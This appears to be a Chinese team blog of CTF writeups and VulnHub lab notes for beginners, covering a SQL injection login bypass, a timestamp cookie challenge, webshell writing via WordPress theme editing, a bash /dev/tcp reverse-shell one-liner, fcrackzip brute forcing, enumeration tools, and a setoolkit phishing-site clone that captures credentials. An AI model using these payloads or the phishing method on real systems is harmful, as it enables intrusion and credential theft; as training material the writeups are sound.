Writeup

⚠：如果需要本次比赛源代码的可以私聊找我要。本篇wp主要面向观众是新成员，用语会比较口语化，如有不严谨的地方还请见谅 WEB easy_SQL 拿到题第一步先审计代码，这里过滤只有一个clean函数，按照常规有两种解题思路 1.在查pass的地方绕过，在name后输入管理员账号即可。但问题就是，我们现在并没有管理员账号，因此没法通过这个方法定位到我们要查的地方。因此这个方法就先排除 2.、在name或pass里插入联合查询，以此来达到读库的目的。但实际操作种碰到问题不仅和上面第一种思路的问题有类似情况，而且还会出现单/双引号被clean过滤的情况 怎么办呢？我们先把query里的sql语句提取出来做一下研究 SELECT * FROM users WHERE name='".$username."' AND pass='".$password."'; 假设我现在输入的username=admin，password=123，那么就是 SELECT * FROM users WHERE name='admin' AND pass='123'; 这里我们先尝试把AND pass删掉，在username输入\ SELECT * FROM users WHERE name='admin\' AND pass='123'; 为什么这样就叫把AND pass删掉呢？因为原本在admin后的引号被斜杠转义成了内容，丧失了原先用来“框住”字符串的功能，而这个功能已经被pass=后面的引号给替代。此时我们只要在password输入or 1=1 -- ，SQL语句变成 SELECT * FROM users WHERE name='admin\' AND pass='or 1=1 -- 123'; 123';就会被注释掉，而这句语句where后面的条件因为or 1=1而100%成立，因此就会执行SELECT * FROM users，即可拿到flag。 这里有个细节需要注意，就是--后面是要带个空格的，一些浏览器会把URL中最后一个空格删掉，因此要手动补一个%20 时光密钥 PS：本题由于容器实例时间校对有错，因此判断登录用的时间戳比真实unix时间戳多了大约15秒。做出来的成员应该是运气比较好，多算了二十几秒就开始发包尝试 打开实例，根据提示，先算出合适的时间戳，再用burp抓包修改一下即可 在网上找到现在的时间戳 burp抓包 为了方便操作，我们把数据包发到repeater 更新一下时间戳，预估个比当前时间戳多20到25秒左右的时间放到password，不断点击send直至出现下面所示的cookie即可 根据所给提示里的博客可知，base64解码该cookie即可获得下面结果 将gift值后面的东西进行base32解码即可 ...

本章靶场：Prime: 1 FUZZ 用来用去感觉还是wfuzz好用，参数简洁明了。这个靶机下用到参数有下面这些 wpscan wpscan的-e参数，可以用来枚举用户名 wordpress修改主题文件 一个意料之外又情理之中的功能，可以用来写一句话木马 防御办法：wp禁止主题编辑操作，通过在wp-config.php中，把define(‘DISALLOW_FILE_EDIT’,true) MSF提权漏洞搜索 在拿到普通用户后，在msf中尝试searchsploit指令，后面加上系统的版本信息，就能找到提权漏洞的exp，编译后上传，再运行即可

本章靶场：Corrosion系列 kali上的目录扫描字典 经过几次vulnhub打靶后发现kali上的目录扫描器可谓是五花八门，一些靶场甚至会出现没有使用指定扫描器就没有正确结果的情况 以下是整理的一些常用字典目录，当然可能有疏漏的地方，但也足以应付大部分场景 #除了默认扫描外，绝对目录均为/usr dirsearch默认扫描 nikto默认扫描 ../share/dirb ../share/dirbuster ../wordlist Bash -i 这个参数的作用是创建一个新的bash交互 但真正实用的是下面这句反弹shell bash -i >& /dev/tcp/IP地址/端口 0>&1 具体分析可以看这里 fcrackzip 这是一个压缩包密码爆破工具。可以使用自定义字符组合 fcrackzip -b -c 'aA1' -l 1-10 -u 123lybbn.zip -b 表示使用暴利破解的方式 -c ‘aA1’ 表示使用大小写字母和数字混合破解的方式 -l 1-10 表示需要破解的密码长度为1到10位 -u 表示只显示破解出来的密码，其他错误的密码不显示出 fcrackzip -D -p lybbnpass.txt -u 123lybbn.zip -D 表示要使用字典破解 -p 表示要使用那个字典破解 nano 我自己本人经常死脑筋只会用vim或者vi来修改文件，但其实很多靶机都会有这个坑，就是没有vi系列，只能用nano UID、GID、EUID、EGID、SUID、SGID 内容比较多，简单说一下 UID是当前实际用户，GID是当前用户组，EUID是文件有效用户，EGID是文件有效用户组 而SUID和SGID更像是设置“全局变量”（其实我也还不太理解，因为暂时没怎么用到），感兴趣的可以看这里 硬链接和软链接 简单来说，在linux文件结构中，硬链接更像是一个“实时同步”，并且即便源文件被删除了也并不影响同步文件的读取。而软链接可以理解成windows系统下的快捷方式。更多细节可以看这里

本期靶场：EMPIRE系列 getcap和setcap 内容比较复杂，看这里 大概就是可以了解一些文件的操作权限是什么，比如一个有root读取权限的可执行文件就能利用 netdiscover 一句命令即可查完内网存活主机，比nmap快n倍 dirb 目录扫描，dirsearch可以平替，但两者字典库不一定一样 enum4linux 用来枚举已开启SMB服务的linux主机用户 wfuzz 模糊路径搜索器，和dirsearch最大区别就在于能够指定一些参数和模糊路径，例如枚举/~myfiles这样的东西。具体用法看这里 ffuf 也是一个模糊搜索工具，不一样的地方在于这个工具是可以自己选择后缀名的 什么意思呢，比如用wfuzz扫http://192.168.2.17/~secret/.FUZZ这个链接，结果只能是某个目录，而如果使用ffuf，则可以扫描到名叫FUZZ的某个文件html，txt，php等各种可自定义后缀的文件 Base家族 凡是带有=填充符，base64要是不行就试试58或者其他的 ssh2john 这是一个ssh私钥处理脚本，在使用john进行ssh私钥爆破时需要先用这个脚本处理 sudo -V 显示版本编号 -h 会显示版本编号及指令的使用方式说明 -l 显示出自己（执行 sudo 的使用者）的权限 -v 因为 sudo 在第一次执行时或是在 N 分钟内没有执行（N 预设为五）会问密码，这个参数是重新做一次确认，如果超过 N 分钟，也会问密码 -k 将会强迫使用者在下一次执行 sudo 时问密码（不论有没有超过 N 分钟） -b 将要执行的指令放在背景执行 -p prompt 可以更改问密码的提示语，其中 %u 会代换为使用者的帐号名称， %h 会显示主机名称 -u username/#uid 不加此参数，代表要以 root 的身份执行指令，而加了此参数，可以以 username 的身份执行指令（#uid 为该 username 的使用者号码） -s 执行环境变数中的 SHELL 所指定的 shell ，或是 /etc/passwd 里所指定的 shell ...

方法 要想制作一个钓鱼网站，就需要满足以下几点条件： 1）一个与原网站高度相似的html页面 2）一台能够与受害者主机有直接或间接联系的终端 虽然看着简单，但单要完成第一步可以说就已经让一些人够呛。所以，想要在Windows上用一般的方法来实现这一目的，显然是比较复杂的。所以Red便下意识地将目光转向了kali。好在kali集成了一款十分强大的工具setoolkit 下面就是我们今天的犯罪嫌疑人Red的操作步骤 在kali命令行中输入setoolkit，就可以打开这一工具。第一次打开需要输入y来进行工具依赖的安装 会出现以下内容 拉到下方，会出现如下内容 翻译后内容如下 社会工程学攻击 快速追踪测试 第三方模块 升级软件 升级配置 帮助 输入1 鱼叉式网络攻击 网页攻击 传染媒介式 建立payload和listener 邮件群发攻击 Arduino基础攻击 无线接入点攻击 二维码攻击 Powershell攻击 第三反方模块 输入2 Java applet攻击 Metasploit浏览器攻击 钓鱼网站攻击 标签钓鱼攻击 网站jacking攻击 多种网站攻击 全屏幕攻击 输入3 网站模板 站点克隆 用自己的网站 输入2，这里进行网站克隆，默认状态下对本地ip回车即可，将oj的登陆网站输入进来，等待捕获输入信息即可。这里用账号：admin，密码：IST22006来输入，可以看到如下内容 可以看到成功捕获，钓鱼网站制作成功~ 怎样让外网访问到？ 这就需要用到一种技术：内网穿透 内网穿透的目的是：让外网能访问你本地的应用，例如在外网打开你本地http://127.0.0.1 指向的Web站点。 那怎么才能实现内网穿透呢？现有工具有花生壳，natapp，小米球工具，前两个都是收费的，最后一个生成的域名前缀是自己设置的，穿透域名是xx.ngrok.xiaomiqiu.cn.有兴趣的可以玩一下。